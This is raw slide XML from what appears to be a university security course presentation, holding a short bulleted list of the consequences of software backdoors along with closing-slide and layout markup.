              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>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微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Backdoors can cause significant damage to a system and its users. Some of the potential consequences of a backdoor include:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="475933" y="2271395"/>
            <a:ext cx="11240135" cy="3476625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLs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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr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1pPr>
            <a:lvl2pPr marL="4572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2pPr>
            <a:lvl3pPr marL="9144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3pPr>
            <a:lvl4pPr marL="13716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4pPr>
            <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="22860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6pPr>
            <a:lvl7pPr marL="27432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7pPr>
            <a:lvl8pPr marL="32004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8pPr>
            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr b="1" kern="1200">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>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Security compromise:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Backdoors provide a means of bypassing normal security measures, making a system vulnerable to unauthorized access and exploitation.</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Data theft:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Attackers can use backdoors to steal sensitive information, such as login credentials, financial data, or intellectual property.</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Spread of malware:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Backdoors can be used as a launch point for further attacks, such as spreading malware to other systems.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571500" indent="-438150">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00B0F0"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="q"/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="-150" checksum="4045237861"/>
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="250" checksum="1039213347"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Reputation damage:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> The discovery of a backdoor can severely damage the reputation of a company or organization, potentially leading to loss of business and customers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="133350" indent="0">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A728BE"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect t="4519" b="16150"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-32385"/>
            <a:ext cx="12179935" cy="6889750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-32385"/>
            <a:ext cx="12192000" cy="6900545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">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vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:noAutofit/>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zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:ea typeface="阿里巴巴普惠体 R" panose="00020600040101010101" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="矩形 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-19050" y="2219960"/>
            <a:ext cx="12198985" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>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rPr>
              <a:t>THE END</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln w="19050">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="思源黑体 CN Normal" panose="020B0400000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9640129" y="6095138"/>
            <a:ext cx="2379149" cy="553085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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0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rPr>
              <a:t>2023.09.27</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4768215" y="3272790"/>
            <a:ext cx="2655570" cy="1245235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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Fangtian</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">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 </a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"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CSCI </a:t>
            </a:r>
            <a:r>
              <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591</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="675098" y="1732630"/>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4"/>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5" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2992261" y="1228497"/>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1"/>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1" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1969007" y="4372353"/>
            <a:ext cx="181896" cy="177458"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 55 w 109"/>
              <a:gd name="T1" fmla="*/ 109 h 109"/>
              <a:gd name="T2" fmla="*/ 51 w 109"/>
              <a:gd name="T3" fmla="*/ 108 h 109"/>
              <a:gd name="T4" fmla="*/ 2 w 109"/>
              <a:gd name="T5" fmla="*/ 59 h 109"/>
              <a:gd name="T6" fmla="*/ 2 w 109"/>
              <a:gd name="T7" fmla="*/ 51 h 109"/>
              <a:gd name="T8" fmla="*/ 51 w 109"/>
              <a:gd name="T9" fmla="*/ 2 h 109"/>
              <a:gd name="T10" fmla="*/ 59 w 109"/>
              <a:gd name="T11" fmla="*/ 2 h 109"/>
              <a:gd name="T12" fmla="*/ 108 w 109"/>
              <a:gd name="T13" fmla="*/ 51 h 109"/>
              <a:gd name="T14" fmla="*/ 109 w 109"/>
              <a:gd name="T15" fmla="*/ 55 h 109"/>
              <a:gd name="T16" fmla="*/ 108 w 109"/>
              <a:gd name="T17" fmla="*/ 59 h 109"/>
              <a:gd name="T18" fmla="*/ 59 w 109"/>
              <a:gd name="T19" fmla="*/ 108 h 109"/>
              <a:gd name="T20" fmla="*/ 55 w 109"/>
              <a:gd name="T21" fmla="*/ 109 h 109"/>
              <a:gd name="T22" fmla="*/ 14 w 109"/>
              <a:gd name="T23" fmla="*/ 55 h 109"/>
              <a:gd name="T24" fmla="*/ 55 w 109"/>
              <a:gd name="T25" fmla="*/ 96 h 109"/>
              <a:gd name="T26" fmla="*/ 96 w 109"/>
              <a:gd name="T27" fmla="*/ 55 h 109"/>
              <a:gd name="T28" fmla="*/ 55 w 109"/>
              <a:gd name="T29" fmla="*/ 14 h 109"/>
              <a:gd name="T30" fmla="*/ 14 w 109"/>
              <a:gd name="T31" fmla="*/ 55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109" h="109">
                <a:moveTo>
                  <a:pt x="55" y="109"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="109"/>
                  <a:pt x="52" y="109"/>
                  <a:pt x="51" y="108"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2" y="59"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="57"/>
                  <a:pt x="0" y="53"/>
                  <a:pt x="2" y="51"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51" y="2"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="0"/>
                  <a:pt x="57" y="0"/>
                  <a:pt x="59" y="2"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="108" y="51"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="52"/>
                  <a:pt x="109" y="53"/>
                  <a:pt x="109" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="56"/>
                  <a:pt x="109" y="58"/>
                  <a:pt x="108" y="59"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="59" y="108"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="109"/>
                  <a:pt x="56" y="109"/>
                  <a:pt x="55" y="109"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14" y="55"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="55" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="55"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="1270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7" name="Freeform 298"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11101499" y="3197526"/>
            <a:ext cx="146050" cy="144463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 123 w 247"/>
              <a:gd name="T1" fmla="*/ 0 h 247"/>
              <a:gd name="T2" fmla="*/ 167 w 247"/>
              <a:gd name="T3" fmla="*/ 80 h 247"/>
              <a:gd name="T4" fmla="*/ 247 w 247"/>
              <a:gd name="T5" fmla="*/ 124 h 247"/>
              <a:gd name="T6" fmla="*/ 167 w 247"/>
              <a:gd name="T7" fmla="*/ 167 h 247"/>
              <a:gd name="T8" fmla="*/ 123 w 247"/>
              <a:gd name="T9" fmla="*/ 247 h 247"/>
              <a:gd name="T10" fmla="*/ 80 w 247"/>
              <a:gd name="T11" fmla="*/ 167 h 247"/>
              <a:gd name="T12" fmla="*/ 0 w 247"/>
              <a:gd name="T13" fmla="*/ 124 h 247"/>
              <a:gd name="T14" fmla="*/ 80 w 247"/>
              <a:gd name="T15" fmla="*/ 80 h 247"/>
              <a:gd name="T16" fmla="*/ 123 w 247"/>
              <a:gd name="T17" fmla="*/ 0 h 2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7" h="247">
                <a:moveTo>
                  <a:pt x="123" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>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18" name="Freeform 302"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11362690" y="1253490"/>
            <a:ext cx="129557" cy="129557"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 75 w 151"/>
              <a:gd name="T1" fmla="*/ 0 h 150"/>
              <a:gd name="T2" fmla="*/ 102 w 151"/>
              <a:gd name="T3" fmla="*/ 48 h 150"/>
              <a:gd name="T4" fmla="*/ 151 w 151"/>
              <a:gd name="T5" fmla="*/ 75 h 150"/>
              <a:gd name="T6" fmla="*/ 102 w 151"/>
              <a:gd name="T7" fmla="*/ 102 h 150"/>
              <a:gd name="T8" fmla="*/ 75 w 151"/>
              <a:gd name="T9" fmla="*/ 150 h 150"/>
              <a:gd name="T10" fmla="*/ 49 w 151"/>
              <a:gd name="T11" fmla="*/ 102 h 150"/>
              <a:gd name="T12" fmla="*/ 0 w 151"/>
              <a:gd name="T13" fmla="*/ 75 h 150"/>
              <a:gd name="T14" fmla="*/ 49 w 151"/>
              <a:gd name="T15" fmla="*/ 48 h 150"/>
              <a:gd name="T16" fmla="*/ 75 w 151"/>
              <a:gd name="T17" fmla="*/ 0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51" h="150">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="102" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solid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5" name="Freeform 157"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10433905" y="2017746"/>
            <a:ext cx="177215" cy="163925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 55 w 110"/>
              <a:gd name="T1" fmla="*/ 100 h 100"/>
              <a:gd name="T2" fmla="*/ 50 w 110"/>
              <a:gd name="T3" fmla="*/ 97 h 100"/>
              <a:gd name="T4" fmla="*/ 1 w 110"/>
              <a:gd name="T5" fmla="*/ 9 h 100"/>
              <a:gd name="T6" fmla="*/ 1 w 110"/>
              <a:gd name="T7" fmla="*/ 3 h 100"/>
              <a:gd name="T8" fmla="*/ 6 w 110"/>
              <a:gd name="T9" fmla="*/ 0 h 100"/>
              <a:gd name="T10" fmla="*/ 104 w 110"/>
              <a:gd name="T11" fmla="*/ 0 h 100"/>
              <a:gd name="T12" fmla="*/ 109 w 110"/>
              <a:gd name="T13" fmla="*/ 3 h 100"/>
              <a:gd name="T14" fmla="*/ 109 w 110"/>
              <a:gd name="T15" fmla="*/ 9 h 100"/>
              <a:gd name="T16" fmla="*/ 60 w 110"/>
              <a:gd name="T17" fmla="*/ 97 h 100"/>
              <a:gd name="T18" fmla="*/ 55 w 110"/>
              <a:gd name="T19" fmla="*/ 100 h 100"/>
              <a:gd name="T20" fmla="*/ 16 w 110"/>
              <a:gd name="T21" fmla="*/ 12 h 100"/>
              <a:gd name="T22" fmla="*/ 55 w 110"/>
              <a:gd name="T23" fmla="*/ 82 h 100"/>
              <a:gd name="T24" fmla="*/ 94 w 110"/>
              <a:gd name="T25" fmla="*/ 12 h 100"/>
              <a:gd name="T26" fmla="*/ 16 w 110"/>
              <a:gd name="T27" fmla="*/ 12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0" h="100">
                <a:moveTo>
                  <a:pt x="55" y="100"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="100"/>
                  <a:pt x="51" y="98"/>
                  <a:pt x="50" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1" y="9"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="7"/>
                  <a:pt x="0" y="5"/>
                  <a:pt x="1" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="2"/>
                  <a:pt x="4" y="0"/>
                  <a:pt x="6" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="0"/>
                  <a:pt x="108" y="2"/>
                  <a:pt x="109" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="5"/>
                  <a:pt x="110" y="7"/>
                  <a:pt x="109" y="9"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="60" y="97"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="98"/>
                  <a:pt x="57" y="100"/>
                  <a:pt x="55" y="100"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16" y="12"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="55" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="12"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>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s-ES" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="4955540"/>
            <a:ext cx="6418580" cy="1139825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
